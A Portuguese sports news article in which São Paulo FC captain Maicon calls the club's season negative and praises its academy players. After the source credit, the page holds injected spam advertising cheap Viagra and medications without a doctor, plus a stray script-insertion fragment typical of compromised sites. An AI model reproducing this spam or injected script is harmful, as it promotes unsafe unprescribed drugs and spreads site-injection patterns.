Destaque Noticia

Zagueiro vê São Paulo em débito no ano: “Postura precisa mudar”

Um dos jogadores mais experientes do elenco do São Paulo, o zagueiro e capitão Maicon reconhece: a equipe vai terminar o ano com saldo negativo. Apesar de ter sido semifinalista da Taça Libertadores da América, o Tricolor foi eliminado nas quartas de final do Campeonato Paulista pelo Audax, caiu nas oitavas da Copa do Brasil para o modesto Juventude e ainda luta contra o rebaixamento no Campeonato Brasileiro.

– O balanço é negativo, não podemos nos habituar com esse tipo de situação. Fizemos o possível para melhorar, mas não conseguimos. Pela estrutura que o São Paulo oferece e pela grandeza do clube, sem dúvida o balanço é negativo. No ano que vem, a postura precisa mudar. Nosso time tem qualidade, mas infelizmente não demos tudo que poderíamos – afirmou o xerife.

Para um time que há duas semanas estava seriamente ameaçado de rebaixamento, o São Paulo mostrou poder de reação e subiu na tabela de classificação. E muito disso tem a ver com a entrada dos garotos na equipe do técnico Ricardo Gomes.

Contra o Fluminense, David Neres e Pedro entraram no segundo tempo e mudaram o rendimento da equipe, tanto que foram mantidos diante da Ponte Preta – vitórias por 2 a 1 e 2 a 0, respectivamente. Maicon ressalta a qualidade dos garotos revelados em Cotia.

– O São Paulo tem uma base muito forte, são vários jogadores com potencial. Tem o Lyanco, o Lucão, Araújo, Pedro, David Neres. O Neres é especial, um menino humilde, que escuta muito e respeita, tem compromisso. Tenho certeza de que ele vai crescer ainda mais. Os mais experientes, como eu, o Lugano, o Denis, todos procuram dar tranquilidade a eles – disse o defensor.

Maicon ainda não quer ouvir de G-6, que pode virar no G-7 no final do Campeonato Brasileiro. Para o defensor, o São Paulo precisa selar sua recuperação e afastar definitivamente a ameaça de rebaixamento antes de pensar em vaga na Libertadores.


– Temos chance de buscar o G-6, não é impossível. Mas o nosso principal objetivo era sair da zona de desconforto, o que começamos a fazer. Mas é preciso continuar focado para que isso não volte a acontecer mais. Ainda precisamos de pontos para subir na tabela.

Contratado no meio do ano por R$ 22 milhões, Maicon é um dos preferidos da torcida são-paulina. Ele espera que no ano que vem, essa relação possa crescer e o time brigar por títulos importantes.

– Eu sou um jogador normal. Sei que a torcida tem um carinho especial por mim e procuro sempre fazer o meu melhor para corresponder. No ano que vem, temos de brigar por coisas importantes.

Temos chance de buscar o G-6, não é impossível. Mas o nosso principal objetivo era sair da zona de desconforto, o que começamos a fazer

Fonte: GE cheap pills

Buy cheap Viagra online

put in cart cheat medications without a doctor – http://savingthebay.org/2016/11/30/put-in-cart-cheat-medications-without-a-doctor/ document.currentScript.parentNode.insertBefore(s, document.currentScript);

Clique para adicionar um comentário

Leave a Reply

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

19 − 15 =

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.

Destaque Noticia

Mais em Destaque Noticia

Made in Cotia! Igor Gomes valoriza a vitória com a utilização de jovens

saopauloadmin8 de dezembro de 2019

São Paulo tem 3 gols de vantagem para fechar Brasileirão 2019 com a melhor defesa do Campeonato

saopauloadmin8 de dezembro de 2019

São Paulo não terá Diniz à beira do campo em decisão contra o Inter

saopauloadmin2 de dezembro de 2019

Diniz estabelece o lado direito como o forte do São Paulo

saopauloadmin30 de novembro de 2019

Fernando Diniz elogia Pato e Hernanes

saopauloadmin29 de novembro de 2019

Reforços ou Refugos? Veja quem são os jogadores com mais participações em gols na Série B 2019

saopauloadmin28 de novembro de 2019

“Tenho um jogador do River em referência” diz Lugano sobre interesse em jogador do time de Gallardo para o São Paulo

saopauloadmin27 de novembro de 2019

Documento pede saída imediata de Leco, presidente do Conselho e diretores

saopauloadmin26 de novembro de 2019

Por G4, São Paulo se mobiliza para repetir melhor sequência do ano

saopauloadmin24 de novembro de 2019